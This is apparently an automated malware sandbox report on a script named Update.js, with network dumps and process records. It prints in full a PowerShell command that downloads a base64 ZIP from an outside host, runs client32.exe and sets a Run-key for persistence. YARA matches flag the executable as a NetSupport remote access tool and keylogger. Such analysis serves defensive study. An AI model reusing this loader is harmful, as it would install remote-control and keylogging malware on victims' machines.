                                                                                Data Ascii: toString()};d.implementsGoogI18nBidiDirectionalString = !0;d.getDirection = function() { return k.i18n.bidi.Dir.LTR};d.toString = function() { return this.privateDoNotAccessOrElseTrustedResourceUrlWrappedValue_ + ""};k.html.TrustedResourceU
                                                                                2024-09-10 14:33:39 UTC16384INData Raw: 54 59 0a 7d 3b 0a 76 61 72 20 54 61 20 3d 20 7b 7d 2c 0a 20 20 20 20 74 20 3d 20 66 75 6e 63 74 69 6f 6e 28 61 2c 20 62 29 20 7b 0a 20 20 20 20 20 20 20 20 74 68 69 73 2e 70 72 69 76 61 74 65 44 6f 4e 6f 74 41 63 63 65 73 73 4f 72 45 6c 73 65 53 61 66 65 53 74 79 6c 65 53 68 65 65 74 57 72 61 70 70 65 64 56 61 6c 75 65 5f 20 3d 20 62 20 3d 3d 3d 20 54 61 20 3f 20 61 20 3a 20 22 22 3b 0a 20 20 20 20 20 20 20 20 74 68 69 73 2e 69 6d 70 6c 65 6d 65 6e 74 73 47 6f 6f 67 53 74 72 69 6e 67 54 79 70 65 64 53 74 72 69 6e 67 20 3d 20 21 30 0a 20 20 20 20 7d 3b 0a 74 2e 63 6f 6e 63 61 74 20 3d 20 66 75 6e 63 74 69 6f 6e 28 61 29 20 7b 0a 20 20 20 20 76 61 72 20 62 20 3d 20 22 22 2c 0a 20 20 20 20 20 20 20 20 63 20 3d 20 66 75 6e 63 74 69 6f 6e 28 66 29 20 7b 0a 20
                                                                                Data Ascii: TY};var Ta = {}, t = function(a, b) { this.privateDoNotAccessOrElseSafeStyleSheetWrappedValue_ = b === Ta ? a : ""; this.implementsGoogStringTypedString = !0 };t.concat = function(a) { var b = "", c = function(f) {
                                                                                2024-09-10 14:33:39 UTC16384INData Raw: 2e 73 61 66 65 2e 73 65 74 49 6e 6e 65 72 48 74 6d 6c 46 72 6f 6d 43 6f 6e 73 74 61 6e 74 20 3d 20 66 75 6e 63 74 69 6f 6e 28 61 2c 20 62 29 20 7b 0a 20 20 20 20 6b 2e 64 6f 6d 2e 73 61 66 65 2e 73 65 74 49 6e 6e 65 72 48 74 6d 6c 28 61 2c 20 6b 2e 68 74 6d 6c 2e 75 6e 63 68 65 63 6b 65 64 63 6f 6e 76 65 72 73 69 6f 6e 73 2e 73 61 66 65 48 74 6d 6c 46 72 6f 6d 53 74 72 69 6e 67 4b 6e 6f 77 6e 54 6f 53 61 74 69 73 66 79 54 79 70 65 43 6f 6e 74 72 61 63 74 28 6b 2e 73 74 72 69 6e 67 2e 43 6f 6e 73 74 2e 66 72 6f 6d 28 22 43 6f 6e 73 74 61 6e 74 20 48 54 4d 4c 20 74 6f 20 62 65 20 69 6d 6d 65 64 69 61 74 65 6c 6c 79 20 75 73 65 64 2e 22 29 2c 20 6b 2e 73 74 72 69 6e 67 2e 43 6f 6e 73 74 2e 75 6e 77 72 61 70 28 62 29 29 29 0a 7d 3b 0a 6b 2e 64 6f 6d 2e 73 61
                                                                                Data Ascii: .safe.setInnerHtmlFromConstant = function(a, b) { k.dom.safe.setInnerHtml(a, k.html.uncheckedconversions.safeHtmlFromStringKnownToSatisfyTypeContract(k.string.Const.from("Constant HTML to be immediatelly used."), k.string.Const.unwrap(b)))};k.dom.sa
                                                                                2024-09-10 14:33:39 UTC16384INData Raw: 61 2e 6a 6f 69 6e 28 62 29 29 3b 0a 20 20 20 20 72 65 74 75 72 6e 20 66 0a 7d 3b 0a 6b 2e 73 74 72 69 6e 67 2e 6c 61 73 74 43 6f 6d 70 6f 6e 65 6e 74 20 3d 20 66 75 6e 63 74 69 6f 6e 28 61 2c 20 62 29 20 7b 0a 20 20 20 20 69 66 20 28 62 29 20 22 73 74 72 69 6e 67 22 20 3d 3d 20 74 79 70 65 6f 66 20 62 20 26 26 20 28 62 20 3d 20 5b 62 5d 29 3b 0a 20 20 20 20 65 6c 73 65 20 72 65 74 75 72 6e 20 61 3b 0a 20 20 20 20 66 6f 72 20 28 76 61 72 20 63 20 3d 20 2d 31 2c 20 66 20 3d 20 30 3b 20 66 20 3c 20 62 2e 6c 65 6e 67 74 68 3b 20 66 2b 2b 29 0a 20 20 20 20 20 20 20 20 69 66 20 28 22 22 20 21 3d 20 62 5b 66 5d 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 67 20 3d 20 61 2e 6c 61 73 74 49 6e 64 65 78 4f 66 28 62 5b 66 5d 29 3b 0a 20 20 20 20 20 20
                                                                                Data Ascii: a.join(b)); return f};k.string.lastComponent = function(a, b) { if (b) "string" == typeof b && (b = [b]); else return a; for (var c = -1, f = 0; f < b.length; f++) if ("" != b[f]) { var g = a.lastIndexOf(b[f]);
                                                                                2024-09-10 14:33:39 UTC16384INData Raw: 6c 6c 65 72 5d 5c 6e 22 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 72 65 61 6b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 66 2b 2b 3b 0a 20 20 20 20 20 20 20 20 69 66 20 28 66 20 3e 3d 20 6b 2e 64 65 62 75 67 2e 4d 41 58 5f 53 54 41 43 4b 5f 44 45 50 54 48 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 2e 70 75 73 68 28 22 5b 2e 2e 2e 6c 6f 6e 67 20 73 74 61 63 6b 2e 2e 2e 5d 22 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 72 65 61 6b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 7d 0a 20 20 20 20 61 20 26 26 20 66 20 3e 3d 20 61 20 3f 20 62 2e 70 75 73 68 28 22 5b 2e 2e 2e 72 65 61 63 68 65 64 20 6d 61 78 20 64 65 70 74 68 20 6c 69 6d 69 74 2e 2e 2e 5d 22 29 20 3a 20 62 2e 70 75 73 68 28 22 5b 65 6e 64 5d 22 29 3b 0a 20 20 20 20
                                                                                Data Ascii: ller]\n"); break } f++; if (f >= k.debug.MAX_STACK_DEPTH) { b.push("[...long stack...]"); break } } a && f >= a ? b.push("[...reached max depth limit...]") : b.push("[end]");


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                1 | 192.168.2.6 | 49733 | 79.141.161.17 | 443 | 5880 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                2024-09-10 14:33:47 UTC | 84 | OUT | GET /data.php?6891 HTTP/1.1
                                                                                Host: ipva2024-detransp.com
                                                                                Connection: Keep-Alive
                                                                                2024-09-10 14:33:47 UTC | 198 | IN | HTTP/1.1 200 OK
                                                                                Date: Tue, 10 Sep 2024 14:33:47 GMT
                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                Vary: Accept-Encoding
                                                                                Connection: close
                                                                                Transfer-Encoding: chunked
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                2024-09-10 14:33:47 UTC7994INData Raw: 33 31 38 64 38 30 0d 0a 55 45 73 44 42 42 51 41 41 41 41 49 41 42 78 45 56 31 65 64 6e 69 58 6d 4a 6d 77 41 41 4a 43 56 41 51 41 4d 41 41 41 41 59 32 78 70 5a 57 35 30 4d 7a 49 75 5a 58 68 6c 37 48 77 48 65 46 54 46 31 2f 66 5a 39 45 34 4b 41 53 4c 36 55 76 36 67 69 42 4a 42 6b 56 63 49 68 45 41 49 6e 59 54 30 73 70 75 79 32 56 52 71 67 43 53 41 45 41 56 52 2f 30 43 6f 41 6f 49 67 69 68 44 53 4e 79 47 46 6b 74 43 4c 51 42 41 51 61 55 6f 58 70 4b 54 33 6e 67 33 6e 4f 7a 4f 37 6d 77 49 4a 55 6f 4c 79 66 67 2f 6e 37 75 2f 65 6d 54 74 6e 7a 73 79 39 76 7a 4e 6e 5a 6d 35 34 6d 4f 43 78 43 6c 51 42 51 49 32 41 43 4c 41 48 35 47 49 46 66 79 39 2f 45 67 79 36 5a 42 70 41 75 76 61 5a 62 6e 73 45 34 38 39 30 63 77 6f 4b 6e 74 55 31 5a 4f 62 30 77 4a 6e 69 71 56 30
                                                                                Data Ascii: 318d80UEsDBBQAAAAIABxEV1edniXmJmwAAJCVAQAMAAAAY2xpZW50MzIuZXhl7HwHeFTF1/fZ9E4KASL6Uv6giBJBkVcIhEAInYT0spuy2VRqgCSAEAVR/0CoAoIgihDSNyGFktCLQBAQaUoXpKT3ng3nOzO7mwIJUoLyfg/n7u/emTtnzsy9vzNnZm54mOCxClQBQI2ACLAH5GIFfy9/Egy6ZBpAuvaZbnsE4890cwoKntU1ZOb0wJniqV0
                                                                                2024-09-10 14:33:47 UTC16384INData Raw: 35 39 62 6c 4e 75 39 7a 37 6d 46 6c 56 69 35 68 49 68 31 32 46 7a 53 39 4f 36 53 52 54 37 70 53 4c 39 42 76 36 56 38 7a 2f 6a 6e 6e 33 2f 59 58 37 77 72 50 6a 58 2b 48 64 39 48 78 50 63 4e 44 48 65 51 36 39 74 51 50 46 2f 32 77 54 41 6b 37 46 4c 4d 4c 65 77 6a 50 6a 4a 77 51 63 50 48 75 43 44 2b 2f 63 78 76 36 51 53 62 31 77 38 67 30 6e 42 76 54 42 36 49 6d 43 38 55 50 38 70 37 4f 6e 52 66 41 4b 59 50 6d 38 6b 5a 70 4f 39 6e 50 77 69 4f 55 66 33 37 79 74 77 44 37 50 7a 38 76 46 42 66 6a 48 4e 43 38 36 34 62 51 78 67 77 74 50 59 46 65 72 7a 6d 4a 49 61 50 68 6a 76 33 61 66 2b 50 63 68 75 73 4d 6e 53 65 53 58 56 75 48 65 70 6b 4f 76 45 75 2b 73 32 71 35 74 4d 59 7a 2f 4a 6b 2f 67 33 49 2f 37 62 74 51 33 2f 7a 34 73 58 35 74 2f 74 35 66 43 66 46 62 65 55 6a
                                                                                Data Ascii: 59blNu9z7mFlVi5hIh12FzS9O6SRT7pSL9Bv6V8z/jnn3/YX7wrPjX+Hd9HxPcNDHeQ69tQPF/2wTAk7FLMLewjPjJwQcPHuCD+/cxv6QSb1w8g0nBvTB6ImC8UP8p7OnRfAKYPm8kZpO9nPwiOUf37ytwD7Pz8vFBfjHNC864bQxgwtPYFerzmJIaPhjv3af+PchusMnSeSXVuHepkOvEu+s2q5tMYz/Jk/g3I/7btQ3/z4sX5t/t5fCfFbeUj
                                                                                2024-09-10 14:33:47 UTC16384INData Raw: 51 62 67 4f 49 43 62 4e 32 36 6c 63 65 42 4a 69 78 66 76 72 77 4e 56 71 78 59 77 64 73 52 31 71 31 62 69 32 66 50 6e 6d 50 35 79 71 2b 52 2b 64 30 58 61 4e 6f 53 68 79 75 5a 4d 54 77 57 4d 73 58 44 70 50 6a 65 50 44 34 30 34 33 53 5a 63 62 76 55 4c 73 59 37 38 65 54 78 68 56 74 69 76 63 76 35 38 6e 6a 67 73 2f 47 7a 44 50 49 34 6d 34 6e 79 4d 38 55 69 76 6c 30 34 6a 2f 50 2f 38 4d 4d 50 51 32 6c 2f 4f 2b 6b 35 37 61 6d 6b 2f 48 65 64 37 58 31 70 58 55 62 2b 2b 43 54 76 31 32 76 59 57 74 6e 38 4e 53 35 6b 70 65 44 71 39 6a 6d 63 6e 35 79 62 48 4e 4c 34 78 31 4b 38 69 66 6e 46 4f 66 48 72 32 65 38 55 4c 34 78 69 42 74 30 70 53 6f 61 66 70 5a 53 2f 62 48 38 6f 38 61 64 31 32 7a 35 32 53 30 66 37 77 57 69 65 69 50 2b 58 33 36 37 44 39 6f 31 66 73 54 46 50 77
                                                                                Data Ascii: QbgOICbN26lceBJixfvrwNVqxYwdsR1q1bi2fPnmP5yq+R+d0XaNoShyuZMTwWMsXDpPjePD4043SZcbvULsY78eTxhVtivcv58njgs/GzDPI4m4nyM8Uivl04j/P/8MMPQ2l/O+k57amk/Hed7X1pXUb++CTv12vYWtn8NS5kpeDq9jmcn5ybHNL4x1K8ifnFOfHr2e8UL4xiBt0pSoafpZS/bH8o8ad12z52S0f7wWieiP+X367D9o1fsTFPw
                                                                                2024-09-10 14:33:47 UTC16384INData Raw: 56 61 47 56 47 46 43 65 5a 56 34 38 75 35 49 32 6d 4a 6c 63 48 2f 6c 66 4d 5a 2f 50 2b 54 74 76 78 49 2f 6d 4e 6a 46 2b 44 76 33 6b 36 39 44 48 58 70 62 2b 41 54 55 31 52 69 61 51 4f 52 46 53 44 53 36 39 47 75 42 31 46 51 35 38 46 64 66 6d 46 66 6b 33 59 51 67 38 51 52 78 6e 70 6f 30 70 48 5a 38 53 70 53 44 41 69 74 51 42 69 34 6d 63 4c 7a 31 4f 36 7a 55 4a 52 5a 44 30 42 56 72 72 30 57 34 48 49 70 4a 6c 36 4b 6f 39 33 56 62 4d 65 31 52 66 34 75 55 58 6a 6d 65 7a 51 50 45 4b 4d 68 30 42 69 6d 39 33 6f 76 72 44 66 34 64 70 4d 70 48 35 4a 6d 4e 6f 41 79 79 30 6e 67 32 57 46 31 37 53 67 45 54 74 62 54 31 76 50 44 67 7a 53 75 4e 56 50 64 32 6b 6f 47 58 32 4d 79 65 4f 6e 64 53 2b 72 50 5a 66 56 61 56 61 6f 76 42 48 30 65 62 62 6f 46 39 42 2f 79 4b 72 36 34 56
                                                                                Data Ascii: VaGVGFCeZV48u5I2mJlcH/lfMZ/P+TtvxI/mNjF+Dv3k69DHXpb+ATU1RiaQORFSDS69GuB1FQ58FdfmFfk3YQg8QRxnpo0pHZ8SpSDAitQBi4mcLz1O6zUJRZD0BVrr0W4HIpJl6Ko93VbMe1Rf4uUXjmezQPEKMh0Bim93ovrDf4dpMpH5JmNoAyy0ng2WF17SgETtbT1vPDgzSuNVPd2koGX2MyeOndS+rPZfVaVaovBH0ebboF9B/yKr64V
                                                                                2024-09-10 14:33:47 UTC16384INData Raw: 6b 52 54 65 6c 44 6b 4e 36 70 6a 6f 75 4c 71 35 70 74 2f 45 63 34 73 56 33 31 32 50 57 6f 4e 35 6c 44 55 42 32 44 48 71 44 65 2b 47 76 75 46 59 4e 5a 43 31 39 45 71 59 6b 68 72 6b 2b 45 6b 54 4c 51 36 72 57 49 48 6e 4d 36 52 53 44 50 62 32 56 4d 38 73 47 4c 4d 59 37 6f 35 72 36 65 42 78 6c 59 76 61 4b 58 65 5a 62 2b 38 57 6d 30 30 79 58 7a 69 33 6f 75 2b 68 6a 2b 39 69 63 53 30 55 4a 75 7a 4b 78 5a 39 79 48 62 48 36 37 37 43 44 34 2b 68 59 38 76 34 4f 4d 72 2b 50 67 61 50 72 36 44 6a 37 50 77 63 51 45 69 31 5a 7a 31 39 35 4f 67 67 41 67 42 79 39 35 6f 51 4f 35 42 31 71 32 47 31 47 49 36 38 63 55 59 62 64 33 37 39 32 68 57 7a 55 35 65 42 48 44 53 6f 58 72 35 30 4a 38 75 4d 77 68 38 4e 38 76 4e 79 63 54 66 64 78 53 59 2b 77 73 70 33 48 6b 57 50 66 52 77 43
                                                                                Data Ascii: kRTelDkN6pjouLq5pt/Ec4sV312PWoN5lDUB2DHqDe+GvuFYNZC19EqYkhrk+EkTLQ6rWIHnM6RSDPb2VM8sGLMY7o5r6eBxlYvaKXeZb+8Wm00yXzi3ou+hj+9icS0UJuzKxZ9yHbH677CD4+hY8v4OMr+PgaPr6Dj7PwcQEi1Zz195OggAgBy95oQO5B1q2G1GI68cUYbd3792hWzU5eBHDSoXr50J8uMwh8N8vNycTfdxSY+wsp3HkWPfRwC
                                                                                2024-09-10 14:33:47 UTC16384INData Raw: 50 78 6d 6b 67 34 36 31 36 37 4e 51 52 33 41 44 31 63 2f 34 5a 41 66 76 4e 4d 6a 6f 48 57 55 43 33 38 57 6d 44 4f 4b 72 59 48 55 75 74 76 73 78 76 71 63 2b 30 47 79 48 57 62 4b 75 2b 31 45 38 62 51 4f 61 5a 54 4c 72 6a 6a 7a 74 43 4e 4a 37 75 49 61 43 59 33 79 6e 50 5a 52 31 5a 78 4d 73 4f 66 61 32 4a 7a 53 6d 62 6a 2b 41 75 54 49 39 63 55 53 4a 51 39 70 75 61 2b 4c 4d 6d 52 46 44 44 4a 41 35 75 4e 73 73 63 73 4a 38 44 68 76 47 69 71 76 30 32 50 47 62 2b 51 47 30 6d 5a 6d 54 57 6c 7a 4a 78 56 41 74 67 59 71 59 2b 62 35 44 49 54 65 63 7a 6b 38 4a 6f 43 76 65 57 46 54 4c 36 5a 54 38 45 71 78 6a 49 63 58 6e 6a 73 5a 71 45 5a 6b 75 43 68 66 2f 6c 6d 2b 41 61 52 78 63 68 4e 2f 35 4c 2b 58 34 4a 56 4e 43 45 77 67 5a 46 76 49 2f 50 4d 63 67 62 37 75 44 54 35 56
                                                                                Data Ascii: Pxmkg46167NQR3AD1c/4ZAfvNMjoHWUC38WmDOKrYHUutvsxvqc+0GyHWbKu+1E8bQOaZTLrjjztCNJ7uIaCY3ynPZR1ZxMsOfa2JzSmbj+AuTI9cUSJQ9pua+LMmRFDDJA5uNsscsJ8DhvGiqv02PGb+QG0mZmTWlzJxVAtgYqY+b5DITeczk8JoCveWFTL6ZT8EqxjIcXnjsZqEZkuChf/lm+AaRxchN/5L+X4JVNCEwgZFvI/PMcgb7uDT5V
                                                                                2024-09-10 14:33:47 UTC16384INData Raw: 66 63 52 64 4e 73 30 4a 2f 48 4a 54 76 6e 75 31 5a 36 77 32 6a 6f 31 7a 59 6b 43 72 6e 6b 75 4d 70 79 72 34 37 6d 58 41 49 33 4a 55 78 73 4d 4d 2b 45 6e 57 64 77 4d 50 38 5a 59 66 75 4e 30 6a 4e 65 41 4f 57 44 2b 63 52 6f 47 4d 78 35 65 32 46 67 54 71 54 44 57 38 6f 74 4d 4a 6a 48 52 56 6f 37 53 68 76 4d 34 77 55 75 65 6d 55 65 56 75 36 6d 6f 36 37 42 53 6b 56 36 79 31 36 6f 5a 4b 7a 57 44 33 4f 35 39 30 4b 77 7a 4d 64 57 71 68 62 2f 74 57 51 69 36 43 59 38 4d 64 33 5a 77 6e 55 57 65 48 37 37 4b 49 41 45 76 6b 41 31 64 58 4e 69 56 7a 58 56 67 76 6c 4a 5a 4d 62 50 32 63 41 57 73 4d 35 43 79 6e 2f 64 76 34 74 71 79 6a 59 6b 6d 75 70 52 45 6a 70 62 7a 46 69 6c 57 2f 32 30 71 7a 34 43 4c 2f 48 46 50 2f 47 4d 38 6f 65 55 32 6a 4b 50 6f 55 70 53 34 4a 4a 44 37
                                                                                Data Ascii: fcRdNs0J/HJTvnu1Z6w2jo1zYkCrnkuMpyr47mXAI3JUxsMM+EnWdwMP8ZYfuN0jNeAOWD+cRoGMx5e2FgTqTDW8otMJjHRVo7ShvM4wUuemUeVu6mo67BSkV6y16oZKzWD3O590KwzMdWqhb/tWQi6CY8Md3ZwnUWeH77KIAEvkA1dXNiVzXVgvlJZMbP2cAWsM5Cyn/dv4tqyjYkmupREjpbzFilW/20qz4CL/HFP/GM8oeU2jKPoUpS4JJD7
                                                                                2024-09-10 14:33:48 UTC16384INData Raw: 70 4e 73 6b 45 77 43 73 6f 39 65 38 36 2f 33 68 35 64 50 57 79 39 6e 58 39 39 6d 64 75 67 2b 45 56 43 30 4e 67 67 66 56 6e 31 35 41 5a 7a 41 47 77 65 76 2f 37 6e 50 77 76 77 61 36 32 41 55 71 62 2b 6f 58 45 45 34 54 67 30 6c 76 7a 6c 30 64 69 45 67 50 79 73 6e 7a 79 58 50 7a 38 64 2b 66 50 7a 58 59 77 58 6c 52 64 6a 77 4d 77 74 4c 45 2f 4f 31 31 38 66 68 4d 79 68 73 57 72 6a 43 5a 31 32 76 64 78 68 47 78 47 45 35 66 63 50 6f 49 2f 52 33 51 4c 77 6d 68 32 61 63 61 55 38 36 57 58 6a 6d 4b 71 5a 39 44 67 5a 6e 39 52 2b 48 4d 73 49 79 34 6f 32 41 79 74 35 4d 73 73 63 57 77 44 55 74 63 2f 7a 62 6b 4e 52 67 69 44 4f 79 47 69 5a 6d 50 72 61 71 76 44 54 45 39 47 4d 36 68 38 6c 6e 62 70 32 42 72 43 6e 2f 52 6c 34 48 39 6d 57 74 43 55 6c 2f 4e 4a 55 4e 61 78 77 43
                                                                                Data Ascii: pNskEwCso9e86/3h5dPWy9nX99mdug+EVC0NggfVn15AZzAGwev/7nPwvwa62AUqb+oXEE4Tg0lvzl0diEgPysnzyXPz8d+fPzXYwXlRdjwMwtLE/O118fhMyhsWrjCZ12vdxhGxGE5fcPoI/R3QLwmh2acaU86WXjmKqZ9DgZn9R+HMsIy4o2Ayt5MsscWwDUtc/zbkNRgiDOyGiZmPraqvDTE9GM6h8lnbp2BrCn/Rl4H9mWtCUl/NJUNaxwC
                                                                                2024-09-10 14:33:48 UTC16384INData Raw: 62 51 4d 34 2b 65 30 2b 69 5a 53 38 2b 70 39 4a 78 43 7a 32 78 36 5a 74 45 7a 6b 35 34 5a 39 45 79 6a 70 34 4f 65 64 6e 72 61 36 4c 6b 56 74 2b 73 6d 31 39 47 7a 6e 70 34 4e 39 48 79 59 6e 6f 2f 53 38 33 46 36 50 6b 46 50 32 74 36 62 2f 41 77 39 6e 36 58 6e 62 6e 6f 2b 54 38 38 39 39 48 79 42 6e 76 76 70 2b 51 6f 39 51 2f 52 38 6a 5a 36 48 36 58 6d 45 35 32 6e 47 35 7a 76 30 33 6b 37 50 6b 2f 54 73 6f 47 63 6e 50 52 6b 39 54 39 47 7a 69 35 37 64 39 49 7a 53 73 34 2b 65 4a 73 72 48 52 6b 38 37 50 52 33 30 64 4e 49 7a 6a 5a 34 5a 39 4d 79 6b 5a 78 59 39 73 2b 6b 35 68 5a 35 54 36 5a 6c 4c 7a 32 6e 30 7a 4b 4e 6e 41 54 32 66 70 4f 63 38 65 70 62 53 73 34 2b 65 55 58 70 32 30 37 4f 4c 6e 71 66 6f 79 65 6a 5a 53 63 38 4f 65 70 36 6b 5a 7a 75 76 4c 7a 32 50 30
                                                                                Data Ascii: bQM4+e0+iZS8+p9JxCz2x6ZtEzk54Z9Eyjp4Oednra6LkVt+sm19Gznp4N9HyYno/S83F6PkFP2t6b/Aw9n6Xnbno+T8899HyBnvvp+Qo9Q/R8jZ6H6XmE52nG5zv03k7Pk/TsoGcnPRk9T9Gzi57d9IzSs4+eJsrHRk87PR30dNIzjZ4Z9MykZxY9s+k5hZ5T6ZlLz2n0zKNnAT2fpOc8epbSs4+eUXp207OLnqfoyejZSc8Oep6kZzuvLz2P0
                                                                                2024-09-10 14:33:48 UTC16384INData Raw: 63 36 2f 79 72 6c 58 30 6e 38 61 30 55 68 4e 68 4d 43 65 70 34 44 41 4a 44 72 4e 2f 58 47 62 46 5a 62 6a 62 6f 4d 46 58 45 79 71 4d 61 6e 69 77 72 57 39 6c 77 63 7a 53 74 34 4b 34 6d 59 55 48 63 66 70 64 61 75 67 37 52 58 56 4c 44 31 61 46 48 41 58 55 69 47 4a 74 4f 32 61 7a 51 41 48 66 49 73 45 32 35 4b 2f 2b 74 63 58 43 59 54 55 54 47 56 33 59 2f 35 4d 68 66 51 41 63 63 43 4e 64 39 55 6d 56 6f 4e 33 68 30 73 53 78 36 51 5a 50 56 39 39 46 74 4a 66 65 30 71 76 64 4f 72 30 32 6e 41 76 45 76 57 6d 76 52 47 6f 2b 37 36 4c 75 34 58 32 31 66 36 54 55 4d 31 4a 51 6f 48 57 2f 71 31 67 62 36 65 37 44 64 35 2b 66 69 70 61 6a 62 4d 51 6e 75 78 59 32 73 56 38 64 30 63 46 64 2b 53 64 58 46 31 56 54 4e 4d 4d 72 68 44 58 4c 31 67 4e 73 30 30 31 55 58 34 75 2b 73 77 6c
                                                                                Data Ascii: c6/yrlX0n8a0UhNhMCep4DAJDrN/XGbFZbjboMFXEyqManiwrW9lwczSt4K4mYUHcfpdaug7RXVLD1aFHAXUiGJtO2azQAHfIsE25K/+tcXCYTUTGV3Y/5MhfQAccCNd9UmVoN3h0sSx6QZPV99FtJfe0qvdOr02nAvEvWmvRGo+76Lu4X21f6TUM1JQoHW/q1gb6e7Dd5+fipajbMQnuxY2sV8d0cFd+SdXF1VTNMMrhDXL1gNs001UX4u+swl



                                                                                Target ID:0
                                                                                Start time:10:33:34
                                                                                Start date:10/09/2024
                                                                                Path:C:\Windows\System32\wscript.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Update.js"
                                                                                Imagebase:0x7ff7c1a20000
                                                                                File size:170'496 bytes
                                                                                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:6
                                                                                Start time:10:33:44
                                                                                Start date:10/09/2024
                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $BZEEOUWZGC='https://ipva2024-detransp.com/data.php?6891';$UDSKJ=(New-Object System.Net.WebClient).DownloadString($BZEEOUWZGC);$ONPFCAS=[System.Convert]::FromBase64String($UDSKJ);$asd = Get-Random -Minimum -5 -Maximum 12; $UNOVQZWFVD=[System.Environment]::GetFolderPath('ApplicationData')+'\XOQEKRYWQK'+$asd;if (!(Test-Path $UNOVQZWFVD -PathType Container)) { New-Item -Path $UNOVQZWFVD -ItemType Directory };$p=Join-Path $UNOVQZWFVD 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ONPFCAS);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$UNOVQZWFVD)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $UNOVQZWFVD 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $UNOVQZWFVD -Force; $fd.attributes='Hidden';$s=$UNOVQZWFVD+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='CJYJHX';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;
                                                                                Imagebase:0x7ff6e3d50000
                                                                                File size:452'608 bytes
                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000002.2317672682.000001C9342A3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000002.2317672682.000001C934153000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000002.2317672682.000001C93417C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000002.2317672682.000001C933F40000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000002.2317672682.000001C934171000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:7
                                                                                Start time:10:33:44
                                                                                Start date:10/09/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff66e660000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:11
                                                                                Start time:10:33:50
                                                                                Start date:10/09/2024
                                                                                Path:C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe"
                                                                                Imagebase:0x3a0000
                                                                                File size:103'824 bytes
                                                                                MD5 hash:C4F1B50E3111D29774F7525039FF7086
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000B.00000002.3445824799.00000000003A2000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000B.00000002.3455268968.000000006FA30000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000B.00000000.2312535683.00000000003A2000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
